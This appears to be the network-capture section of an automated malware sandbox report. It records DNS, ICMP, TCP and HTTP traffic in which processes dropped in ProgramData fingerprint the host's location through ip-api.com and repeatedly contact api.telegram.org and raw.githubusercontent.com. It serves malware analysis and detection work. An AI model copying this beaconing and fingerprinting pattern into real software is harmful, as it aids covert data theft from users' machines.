Sep 2, 2024 16:51:51.164972067 CEST	56265	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:51.165363073 CEST	56265	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:51.334186077 CEST	443	56266	185.199.108.133	192.168.2.5
Sep 2, 2024 16:51:51.334286928 CEST	56266	443	192.168.2.5	185.199.108.133
Sep 2, 2024 16:51:51.335743904 CEST	56266	443	192.168.2.5	185.199.108.133
Sep 2, 2024 16:51:51.335756063 CEST	443	56266	185.199.108.133	192.168.2.5
Sep 2, 2024 16:51:51.335962057 CEST	443	56266	185.199.108.133	192.168.2.5
Sep 2, 2024 16:51:51.382528067 CEST	56266	443	192.168.2.5	185.199.108.133
Sep 2, 2024 16:51:51.428514957 CEST	443	56266	185.199.108.133	192.168.2.5
Sep 2, 2024 16:51:51.484308004 CEST	443	56266	185.199.108.133	192.168.2.5
Sep 2, 2024 16:51:51.484395981 CEST	443	56266	185.199.108.133	192.168.2.5
Sep 2, 2024 16:51:51.484457016 CEST	56266	443	192.168.2.5	185.199.108.133
Sep 2, 2024 16:51:51.489139080 CEST	56266	443	192.168.2.5	185.199.108.133
Sep 2, 2024 16:51:52.057032108 CEST	56263	80	192.168.2.5	208.95.112.1
Sep 2, 2024 16:51:52.166726112 CEST	56267	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:52.166759014 CEST	443	56267	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:52.166937113 CEST	56267	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:52.167174101 CEST	56267	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:52.167182922 CEST	443	56267	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:52.167341948 CEST	56268	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:52.167372942 CEST	443	56268	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:52.167469025 CEST	56268	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:52.168023109 CEST	56268	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:52.168035030 CEST	443	56268	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:52.773365021 CEST	443	56268	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:52.774873018 CEST	56268	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:52.774900913 CEST	443	56268	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:52.784616947 CEST	443	56267	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:52.785487890 CEST	56267	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:52.785518885 CEST	443	56267	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:53.016980886 CEST	443	56268	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:53.017060995 CEST	443	56268	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:53.017122984 CEST	56268	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:53.017518997 CEST	56268	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:53.030592918 CEST	443	56267	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:53.030658960 CEST	443	56267	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:53.030724049 CEST	56267	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:53.031050920 CEST	56267	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:54.026173115 CEST	56269	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:54.026237011 CEST	443	56269	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:54.026321888 CEST	56269	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:54.026547909 CEST	56269	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:54.026559114 CEST	443	56269	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:54.041558027 CEST	56270	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:54.041570902 CEST	443	56270	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:54.041635036 CEST	56270	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:54.041840076 CEST	56270	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:54.041846991 CEST	443	56270	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:54.642386913 CEST	443	56269	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:54.644330978 CEST	443	56270	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:54.648580074 CEST	56270	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:54.648602009 CEST	443	56270	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:54.649189949 CEST	56269	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:54.649208069 CEST	443	56269	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:54.894905090 CEST	443	56269	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:54.894982100 CEST	443	56269	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:54.895057917 CEST	56269	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:54.895474911 CEST	56269	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:54.896517992 CEST	443	56270	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:54.896600962 CEST	443	56270	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:54.896636963 CEST	56270	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:54.896855116 CEST	56270	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:55.900966883 CEST	56272	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:55.900966883 CEST	56271	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:55.901025057 CEST	443	56272	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:55.901025057 CEST	443	56271	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:55.901125908 CEST	56272	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:55.901125908 CEST	56271	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:55.901381016 CEST	56271	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:55.901385069 CEST	56272	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:55.901395082 CEST	443	56271	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:55.901396990 CEST	443	56272	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:56.496809006 CEST	443	56272	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:56.498081923 CEST	56272	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:56.498111963 CEST	443	56272	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:56.504702091 CEST	443	56271	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:56.505487919 CEST	56271	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:56.505516052 CEST	443	56271	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:56.755723953 CEST	443	56271	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:56.755816936 CEST	443	56271	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:56.755872965 CEST	56271	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:56.756232023 CEST	56271	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:56.774799109 CEST	443	56272	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:56.774885893 CEST	443	56272	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:56.774935961 CEST	56272	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:56.775269032 CEST	56272	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:57.779932022 CEST	56273	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:57.779983044 CEST	443	56273	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:57.780072927 CEST	56273	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:57.780333996 CEST	56273	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:57.780349016 CEST	443	56273	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:57.792380095 CEST	56274	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:57.792414904 CEST	443	56274	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:57.792467117 CEST	56274	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:57.792686939 CEST	56274	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:57.792696953 CEST	443	56274	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:58.372116089 CEST	443	56273	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:58.376085997 CEST	56273	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:58.376111031 CEST	443	56273	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:58.387135983 CEST	443	56274	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:58.387985945 CEST	56274	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:58.387996912 CEST	443	56274	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:58.551345110 CEST	443	56273	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:58.551418066 CEST	443	56273	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:58.551512957 CEST	56273	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:58.551882982 CEST	56273	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:58.632199049 CEST	443	56274	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:58.632276058 CEST	443	56274	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:58.632322073 CEST	56274	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:58.632678032 CEST	56274	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:59.557162046 CEST	56275	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:59.557204962 CEST	443	56275	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:59.557374001 CEST	56275	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:59.557702065 CEST	56275	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:59.557712078 CEST	443	56275	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:59.635231018 CEST	56276	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:59.635267973 CEST	443	56276	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:59.635338068 CEST	56276	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:59.635643959 CEST	56276	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:59.635653019 CEST	443	56276	149.154.167.220	192.168.2.5
Sep 2, 2024 16:52:00.160690069 CEST	443	56275	149.154.167.220	192.168.2.5
Sep 2, 2024 16:52:00.162015915 CEST	56275	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:52:00.162053108 CEST	443	56275	149.154.167.220	192.168.2.5
Sep 2, 2024 16:52:00.222543001 CEST	443	56276	149.154.167.220	192.168.2.5
Sep 2, 2024 16:52:00.223651886 CEST	56276	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:52:00.223668098 CEST	443	56276	149.154.167.220	192.168.2.5
Sep 2, 2024 16:52:00.409135103 CEST	443	56275	149.154.167.220	192.168.2.5
Sep 2, 2024 16:52:00.409209967 CEST	443	56275	149.154.167.220	192.168.2.5
Sep 2, 2024 16:52:00.409254074 CEST	56275	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:52:00.409625053 CEST	56275	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:52:00.467503071 CEST	443	56276	149.154.167.220	192.168.2.5
Sep 2, 2024 16:52:00.467578888 CEST	443	56276	149.154.167.220	192.168.2.5
Sep 2, 2024 16:52:00.467628956 CEST	56276	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:52:00.467994928 CEST	56276	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:52:01.416610956 CEST	56277	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:52:01.416672945 CEST	443	56277	149.154.167.220	192.168.2.5
Sep 2, 2024 16:52:01.416785955 CEST	56277	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:52:01.417099953 CEST	56277	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:52:01.417113066 CEST	443	56277	149.154.167.220	192.168.2.5
Sep 2, 2024 16:52:01.479020119 CEST	56278	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:52:01.479062080 CEST	443	56278	149.154.167.220	192.168.2.5
Sep 2, 2024 16:52:01.479262114 CEST	56278	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:52:01.479509115 CEST	56278	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:52:01.479521990 CEST	443	56278	149.154.167.220	192.168.2.5
Sep 2, 2024 16:52:02.004772902 CEST	443	56277	149.154.167.220	192.168.2.5
Sep 2, 2024 16:52:02.006380081 CEST	56277	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:52:02.006414890 CEST	443	56277	149.154.167.220	192.168.2.5
Sep 2, 2024 16:52:02.063231945 CEST	443	56278	149.154.167.220	192.168.2.5
Sep 2, 2024 16:52:02.064333916 CEST	56278	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:52:02.064352036 CEST	443	56278	149.154.167.220	192.168.2.5
Sep 2, 2024 16:52:02.319010019 CEST	443	56277	149.154.167.220	192.168.2.5
Sep 2, 2024 16:52:02.319092035 CEST	443	56277	149.154.167.220	192.168.2.5
Sep 2, 2024 16:52:02.319155931 CEST	443	56278	149.154.167.220	192.168.2.5
Sep 2, 2024 16:52:02.319225073 CEST	443	56278	149.154.167.220	192.168.2.5
Sep 2, 2024 16:52:02.319241047 CEST	56277	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:52:02.319282055 CEST	56278	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:52:02.319722891 CEST	56277	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:52:02.319993019 CEST	56278	443	192.168.2.5	149.154.167.220

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 2, 2024 16:50:05.864142895 CEST	65133	53	192.168.2.5	1.1.1.1
Sep 2, 2024 16:50:05.871073961 CEST	53	65133	1.1.1.1	192.168.2.5
Sep 2, 2024 16:50:08.760386944 CEST	52736	53	192.168.2.5	1.1.1.1
Sep 2, 2024 16:50:08.767411947 CEST	53	52736	1.1.1.1	192.168.2.5
Sep 2, 2024 16:50:17.284205914 CEST	53	49689	1.1.1.1	192.168.2.5
Sep 2, 2024 16:50:37.966517925 CEST	51828	53	192.168.2.5	1.1.1.1
Sep 2, 2024 16:50:37.973298073 CEST	53	51828	1.1.1.1	192.168.2.5
Sep 2, 2024 16:51:08.737864971 CEST	49733	53	192.168.2.5	1.1.1.1
Sep 2, 2024 16:51:08.744446993 CEST	53	49733	1.1.1.1	192.168.2.5
Sep 2, 2024 16:51:49.499747992 CEST	64856	53	192.168.2.5	1.1.1.1
Sep 2, 2024 16:51:49.508575916 CEST	53	64856	1.1.1.1	192.168.2.5

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Type
Sep 2, 2024 16:50:37.990000010 CEST	192.168.2.5	149.154.167.220	4d59	Echo
Sep 2, 2024 16:50:38.007015944 CEST	149.154.167.220	192.168.2.5	5559	Echo Reply
Sep 2, 2024 16:51:15.298933983 CEST	192.168.2.5	149.154.167.220	4d57	Echo
Sep 2, 2024 16:51:15.317352057 CEST	149.154.167.220	192.168.2.5	5557	Echo Reply

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 2, 2024 16:50:05.864142895 CEST	192.168.2.5	1.1.1.1	0x6f65	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Sep 2, 2024 16:50:08.760386944 CEST	192.168.2.5	1.1.1.1	0x5452	Standard query (0)	raw.githubusercontent.com	A (IP address)	IN (0x0001)	false
Sep 2, 2024 16:50:37.966517925 CEST	192.168.2.5	1.1.1.1	0x6b90	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Sep 2, 2024 16:51:08.737864971 CEST	192.168.2.5	1.1.1.1	0x5b57	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Sep 2, 2024 16:51:49.499747992 CEST	192.168.2.5	1.1.1.1	0xaf7a	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Sep 2, 2024 16:50:05.871073961 CEST	1.1.1.1	192.168.2.5	0x6f65	No error (0)	ip-api.com	208.95.112.1	A (IP address)	IN (0x0001)	false
Sep 2, 2024 16:50:08.767411947 CEST	1.1.1.1	192.168.2.5	0x5452	No error (0)	raw.githubusercontent.com	185.199.108.133	A (IP address)	IN (0x0001)	false
Sep 2, 2024 16:50:08.767411947 CEST	1.1.1.1	192.168.2.5	0x5452	No error (0)	raw.githubusercontent.com	185.199.109.133	A (IP address)	IN (0x0001)	false
Sep 2, 2024 16:50:08.767411947 CEST	1.1.1.1	192.168.2.5	0x5452	No error (0)	raw.githubusercontent.com	185.199.110.133	A (IP address)	IN (0x0001)	false
Sep 2, 2024 16:50:08.767411947 CEST	1.1.1.1	192.168.2.5	0x5452	No error (0)	raw.githubusercontent.com	185.199.111.133	A (IP address)	IN (0x0001)	false
Sep 2, 2024 16:50:37.973298073 CEST	1.1.1.1	192.168.2.5	0x6b90	No error (0)	api.telegram.org	149.154.167.220	A (IP address)	IN (0x0001)	false
Sep 2, 2024 16:51:08.744446993 CEST	1.1.1.1	192.168.2.5	0x5b57	No error (0)	ip-api.com	208.95.112.1	A (IP address)	IN (0x0001)	false
Sep 2, 2024 16:51:49.508575916 CEST	1.1.1.1	192.168.2.5	0xaf7a	No error (0)	ip-api.com	208.95.112.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

raw.githubusercontent.com

api.telegram.org

ip-api.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49706	208.95.112.1	80	7716	C:\ProgramData\main.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 16:50:05.973467112 CEST	65	OUT	GET /json/ HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Sep 2, 2024 16:50:06.727399111 CEST	482	IN	HTTP/1.1 200 OK Date: Mon, 02 Sep 2024 14:50:06 GMT Content-Type: application/json; charset=utf-8 Content-Length: 305 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 59 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 7a 69 70 22 3a 22 31 30 31 32 33 22 2c 22 6c 61 74 22 3a 34 30 2e 37 31 32 38 2c 22 6c 6f 6e 22 3a 2d 37 34 2e 30 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 4c 65 76 65 6c 20 33 22 2c 22 6f 72 67 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 2c 20 4c 4c 43 22 2c 22 61 73 22 3a 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 7d Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/New_York","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","query":"8.46.123.33"}
Sep 2, 2024 16:50:06.728841066 CEST	482	IN	HTTP/1.1 200 OK Date: Mon, 02 Sep 2024 14:50:06 GMT Content-Type: application/json; charset=utf-8 Content-Length: 305 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 59 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 7a 69 70 22 3a 22 31 30 31 32 33 22 2c 22 6c 61 74 22 3a 34 30 2e 37 31 32 38 2c 22 6c 6f 6e 22 3a 2d 37 34 2e 30 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 4c 65 76 65 6c 20 33 22 2c 22 6f 72 67 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 2c 20 4c 4c 43 22 2c 22 61 73 22 3a 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 7d Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/New_York","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","query":"8.46.123.33"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
1	192.168.2.5	56191	208.95.112.1	80

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 16:50:31.484551907 CEST	65	OUT	GET /json/ HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Sep 2, 2024 16:50:31.942344904 CEST	482	IN	HTTP/1.1 200 OK Date: Mon, 02 Sep 2024 14:50:31 GMT Content-Type: application/json; charset=utf-8 Content-Length: 305 Access-Control-Allow-Origin: * X-Ttl: 34 X-Rl: 43 Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 59 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 7a 69 70 22 3a 22 31 30 31 32 33 22 2c 22 6c 61 74 22 3a 34 30 2e 37 31 32 38 2c 22 6c 6f 6e 22 3a 2d 37 34 2e 30 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 4c 65 76 65 6c 20 33 22 2c 22 6f 72 67 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 2c 20 4c 4c 43 22 2c 22 61 73 22 3a 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 7d Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/New_York","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","query":"8.46.123.33"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
2	192.168.2.5	56214	208.95.112.1	80

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 16:51:08.808245897 CEST	65	OUT	GET /json/ HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Sep 2, 2024 16:51:09.263350964 CEST	482	IN	HTTP/1.1 200 OK Date: Mon, 02 Sep 2024 14:51:09 GMT Content-Type: application/json; charset=utf-8 Content-Length: 305 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 59 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 7a 69 70 22 3a 22 31 30 31 32 33 22 2c 22 6c 61 74 22 3a 34 30 2e 37 31 32 38 2c 22 6c 6f 6e 22 3a 2d 37 34 2e 30 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 4c 65 76 65 6c 20 33 22 2c 22 6f 72 67 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 2c 20 4c 4c 43 22 2c 22 61 73 22 3a 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 7d Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/New_York","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","query":"8.46.123.33"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	56215	208.95.112.1	80	7556	C:\ProgramData\Microsoft\based.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 16:51:09.315489054 CEST	116	OUT	GET /json/?fields=225545 HTTP/1.1 Host: ip-api.com Accept-Encoding: identity User-Agent: python-urllib3/2.2.2
Sep 2, 2024 16:51:09.899324894 CEST	379	IN	HTTP/1.1 200 OK Date: Mon, 02 Sep 2024 14:51:09 GMT Content-Type: application/json; charset=utf-8 Content-Length: 202 Access-Control-Allow-Origin: * X-Ttl: 59 X-Rl: 43 Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 33 33 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 7d Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-33.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.33"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
4	192.168.2.5	56263	208.95.112.1	80

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 16:51:49.520622969 CEST	65	OUT	GET /json/ HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
